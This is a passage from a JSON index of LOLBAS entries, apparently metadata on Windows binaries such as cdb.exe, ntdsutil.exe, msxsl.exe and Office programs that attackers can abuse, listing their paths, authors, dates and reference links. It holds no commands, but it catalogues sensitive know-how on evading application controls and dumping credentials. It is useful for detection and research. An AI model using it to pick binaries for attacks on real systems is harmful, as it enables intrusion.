@nas_bench"],"references":["http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html","https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda","https://mrd0x.com/the-power-of-cdb-debugging-tool/","https://twitter.com/nas_bench/status/1534957360032120833","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/"],"count":3},{"id":"lolbas:coregen-exe","name":"coregen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe","C:\\Program Files (x86)\\Microsoft Silverlight\\5.1.50918.0\\coregen.exe"],"author":"Martin Sohn Christensen","created":"2020-10-09T00:00:00.000Z","contributors":["Nicky Tyrer","Evan Pena","Casey Erikson"],"references":["https://www.youtube.com/watch?v=75XImxOOInU","https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/coregen/"],"count":3},{"id":"lolbas:createdump-exe","name":"Createdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files (x86)\\dotnet\\shared\\Microsoft.NETCore.App\\<version>\\createdump.exe","C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\dotnet\\runtime\\shared\\Microsoft.NETCore.App\\6.0.0\\createdump.exe"],"author":"mr.d0x, Daniel Santos","created":"2022-01-20T00:00:00.000Z","contributors":["bopin @bopin2020"],"references":["https://twitter.com/bopin2020/status/1366400799199272960","https://docs.microsoft.com/en-us/troubleshoot/developer/webapps/aspnetcore/practice-troubleshoot-linux/lab-1-3-capture-core-crash-dumps","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/"],"count":1},{"id":"lolbas:csi-exe","name":"csi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\MSBuild\\15.0\\Bin\\Roslyn\\csi.exe","c:\\Program Files (x86)\\Microsoft Web Tools\\Packages\\Microsoft.Net.Compilers.X.Y.Z\\tools\\csi.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee"],"references":["https://twitter.com/subTee/status/781208810723549188","https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/csi/"],"count":1},{"id":"lolbas:defaultpack-exe","name":"DefaultPack.EXE","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\DefaultPack\\DefaultPack.exe"],"author":"@checkymander","created":"2020-10-01T00:00:00.000Z","contributors":["checkymander @checkymander"],"references":["https://twitter.com/checkymander/status/1311509470275604480.","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/"],"count":1},{"id":"lolbas:devinit-exe","name":"Devinit.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\Tools\\devinit\\devinit.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://twitter.com/mrd0x/status/1460815932402679809","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/"],"count":1},{"id":"lolbas:devtoolslauncher-exe","name":"Devtoolslauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\devtoolslauncher.exe"],"author":"felamos","created":"2019-10-04T00:00:00.000Z","contributors":["felamos @_felamos"],"references":["https://twitter.com/_felamos/status/1179811992841797632","https://www.virustotal.com/gui/file/84877a507af8b70c145777a87eaf28a8327c50a1563fe650f34572bef8a42ff6/details","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/"],"count":2},{"id":"lolbas:dnx-exe","name":"dnx.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dnx/"],"count":1},{"id":"lolbas:dotnet-exe","name":"Dotnet.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\dotnet.exe"],"author":"felamos","created":"2019-11-12T00:00:00.000Z","contributors":["felamos @_felamos","Jimmy @bohops","yamalon @mavinject"],"references":["https://twitter.com/_felamos/status/1204705548668555264","https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc","https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/","https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/"],"count":4},{"id":"lolbas:dsdbutil-exe","name":"dsdbutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["dsDbUtil.exe"],"fullPath":["C:\\Windows\\System32\\dsdbutil.exe","C:\\Windows\\SysWOW64\\dsdbutil.exe"],"author":"Ekitji","created":"2023-05-31T00:00:00.000Z","contributors":["bohop @bohops","Ekitji @eki_erk"],"references":["https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358","https://www.netwrix.com/ntds_dit_security_active_directory.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dsdbutil/"],"count":5},{"id":"lolbas:dtutil-exe","name":"dtutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\<version>\\DTS\\Binn\\dtutil.exe"],"author":"Avihay Eldad","created":"2024-06-17T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/sql/integration-services/dtutil-utility?view=sql-server-ver16","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dtutil/"],"count":1},{"id":"lolbas:dump64-exe","name":"Dump64.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe"],"author":"mr.d0x","created":"2021-11-16T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://twitter.com/mrd0x/status/1460597833917251595","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dump64/"],"count":1},{"id":"lolbas:dumpminitool-exe","name":"DumpMinitool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\\DumpMinitool.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://twitter.com/mrd0x/status/1511415432888131586","https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/"],"count":1},{"id":"lolbas:dxcap-exe","name":"Dxcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\dxcap.exe","C:\\Windows\\SysWOW64\\dxcap.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt harr0ey @harr0ey","Vikas Singh @vikas891","Naor Evgi @ghosts621"],"references":["https://twitter.com/harr0ey/status/992008180904419328","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/"],"count":2},{"id":"lolbas:ecmangen-exe","name":"ECMangen.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\ECMangen.exe","C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\Bin\\x64\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\<version>\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\Bin\\ECMangen.exe","C:\\Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Bin\\ECMangen.exe","C:\\ExchangeServer\\Bin\\ECMangen.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ECMangen/"],"count":1},{"id":"lolbas:excel-exe","name":"Excel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office16\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office15\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office14\\Excel.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe","C:\\Program Files\\Microsoft Office\\Office12\\Excel.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/"],"count":1},{"id":"lolbas:fsi-exe","name":"Fsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\dotnet\\sdk\\<version>\\FSharp\\fsi.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsi.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://twitter.com/NickTyrer/status/904273264385589248","https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/"],"count":2},{"id":"lolbas:fsianycpu-exe","name":"FsiAnyCpu.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\CommonExtensions\\Microsoft\\FSharp\\fsianycpu.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Nick Tyrer @NickTyrer","Jimmy @bohops"],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/"],"count":2},{"id":"lolbas:intellitrace-exe","name":"IntelliTrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\IntelliTrace\\IntelliTrace.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/visualstudio/debugger/intellitrace","https://lolbas-project.github.io/lolbas/OtherMSBinaries/IntelliTrace/"],"count":1},{"id":"lolbas:logger-exe","name":"Logger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x86\\logger.exe","C:\\Program Files\\Windows Kits\\10\\Debuggers\\x64\\logger.exe"],"author":"Avihay Eldad","created":"2025-07-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/logger","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Logger/"],"count":3},{"id":"lolbas:mftrace-exe","name":"Mftrace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\\mftrace.exe","C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mftrace.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["fabrizio @0rbz_"],"references":["https://twitter.com/0rbz_/status/988911181422186496","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/"],"count":1},{"id":"lolbas:microsoft-nodejstools-pressanykey-exe","name":"Microsoft.NodejsTools.PressAnyKey.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe"],"author":"mr.d0x","created":"2022-01-20T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://twitter.com/mrd0x/status/1463526834918854661","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey/"],"count":1},{"id":"lolbas:mpiexec-exe","name":"Mpiexec.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe","C:\\Program Files (x86)\\Microsoft MPI\\Bin\\mpiexec.exe"],"author":"Avihay Eldad","created":"2025-09-25T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mpiexec/"],"count":1},{"id":"lolbas:msaccess-exe","name":"MSAccess.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSAccess.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSAccess.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSAccess.exe"],"author":"Nir Chako","created":"2023-04-30T00:00:00.000Z","contributors":["Nir Chako @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MSAccess/"],"count":1},{"id":"lolbas:mscopilot-exe","name":"Mscopilot.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot/"],"count":1},{"id":"lolbas:mscopilot-proxy-exe","name":"Mscopilot_proxy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft\\Copilot\\Application\\mscopilot_proxy.exe"],"author":"4n4s4zi","created":"2026-04-14T00:00:00.000Z","contributors":["4n4s4zi @4n4s4zi"],"references":["https://github.com/4n4s4zi/tour-de-mscopilot","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mscopilot_proxy/"],"count":1},{"id":"lolbas:msdeploy-exe","name":"Msdeploy.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V2\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V3\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V4\\msdeploy.exe","C:\\Program Files\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe","C:\\Program Files (x86)\\IIS\\Microsoft Web Deploy V5\\msdeploy.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken","Avihay Eldad @AvihayEldad"],"references":["https://twitter.com/pabraeken/status/995837734379032576","https://twitter.com/pabraeken/status/999090532839313408","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/"],"count":3},{"id":"lolbas:msohtmed-exe","name":"MsoHtmEd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSOHTMED.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe","C:\\Program Files\\Microsoft Office\\Office12\\MSOHTMED.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/"],"count":1},{"id":"lolbas:mspub-exe","name":"Mspub.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office16\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office15\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\MSPUB.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.exe","C:\\Program Files\\Microsoft Office\\Office14\\MSPUB.exe"],"author":"Nir Chako","created":"2022-08-02T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/"],"count":1},{"id":"lolbas:msxsl-exe","name":"msxsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subtee","Ronnie Salomonsen @r0ns3n"],"references":["https://twitter.com/subTee/status/877616321747271680","https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker","https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file","https://lolbas-project.github.io/lolbas/OtherMSBinaries/msxsl/"],"count":6},{"id":"lolbas:nmcap-exe","name":"Nmcap.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Network Monitor 3\\nmcap.exe","C:\\Program Files (x86)\\Microsoft Network Monitor 3\\nmcap.exe"],"author":"Avihay Eldad","created":"2025-09-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/network-monitor-3","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Nmcap/"],"count":1},{"id":"lolbas:ntdsutil-exe","name":"ntdsutil.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\ntdsutil.exe"],"author":"Tony Lambert","created":"2020-01-10T00:00:00.000Z","contributors":["Sean Metcalf @PyroTek3"],"references":["https://adsecurity.org/?p=2398#CreateIFM","https://lolbas-project.github.io/lolbas/OtherMSBinaries/ntdsutil/"],"count":1},{"id":"lolbas:ntsd-exe","name":"Ntsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\ntsd.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\ntsd.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options","https://strontic.github.io/xcyclopedia/library/ntsd.exe-629EA12D527237B9CD945AC44C2DE80D.html","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntsd/"],"count":1},{"id":"lolbas:openconsole-exe","name":"OpenConsole.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os86\\OpenConsole.exe","C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\Terminal\\ServiceHub\\os64\\OpenConsole.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\\OpenConsole.exe"],"author":"Nasreddine Bencherchali","created":"2022-06-17T00:00:00.000Z","contributors":["Nasreddine Bencherchali @nas_bench"],"references":["https://twitter.com/nas_bench/status/1537563834478645252","https://lolbas-project.github.io/lolbas/OtherMSBinaries/OpenConsole/"],"count":1},{"id":"lolbas:outlook-exe","name":"Outlook.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office16\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office15\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office14\\Outlook.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe","C:\\Program Files\\Microsoft Office\\Office12\\Outlook.exe"],"author":"Nir Chako","created":"2022-11-08T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Outlook/"],"count":1},{"id":"lolbas:pixtool-exe","name":"Pixtool.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft PIX\\pixtool.exe","C:\\Program Files (x86)\\Microsoft PIX\\pixtool.exe"],"author":"Avihay Eldad","created":"2025-09-21T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://devblogs.microsoft.com/pix/pixtool/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Pixtool/"],"count":1},{"id":"lolbas:powerpnt-exe","name":"Powerpnt.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe","C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) 